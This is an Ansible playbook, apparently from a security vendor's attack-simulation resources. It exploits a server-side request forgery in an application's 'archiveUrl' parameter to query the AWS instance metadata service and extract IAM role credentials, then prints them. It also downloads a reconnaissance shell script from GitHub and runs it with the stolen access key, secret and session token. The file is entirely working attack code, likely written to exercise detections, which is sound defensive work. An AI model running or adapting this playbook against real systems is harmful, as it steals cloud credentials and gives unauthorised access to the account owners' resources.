- hosts: all
  gather_facts: false
  tasks:
  - name: get role name
    ansible.builtin.uri:
      url: "{{ app_url }}/api/archives?archiveUrl=http://169.254.169.254/latest/meta-data/iam/security-credentials/"
      return_content: true
    register: role_name
  - name: get creds
    ansible.builtin.uri:
      url: "{{ app_url }}/api/archives?archiveUrl=http://169.254.169.254/latest/meta-data/iam/security-credentials/{{ role_name['content'] }}"
      return_content: true
    register: creds
  - name: Print creds
    ansible.builtin.debug:
      msg: "{{ creds['content'] | from_json }}"
  - name: install pip
    become: true
    apt:
      name: python3-pip
      state: present
  - name: Install AWS CLI for aws cli user
    become: true
    pip:
      name: awscli
      state: latest
  - name: download script
    ansible.builtin.get_url:
      url: https://raw.githubusercontent.com/lacework-dev/detc-resources/ipcrm/scripts/util/scripts/aws_recon_composite_alerts.sh
      dest: /tmp/discovery.sh
      mode: '0700'
  - name: run discovery
    shell: "sh /tmp/discovery.sh"
    ignore_errors: true # might be expected
    environment:
      AWS_REGION: "{{ aws_region }}"
      AWS_ACCESS_KEY_ID: "{{ (creds['content'] | from_json).AccessKeyId }}"
      AWS_SECRET_ACCESS_KEY: "{{ (creds['content'] | from_json).SecretAccessKey }}"
      AWS_SESSION_TOKEN: "{{ (creds['content'] | from_json).Token }}"
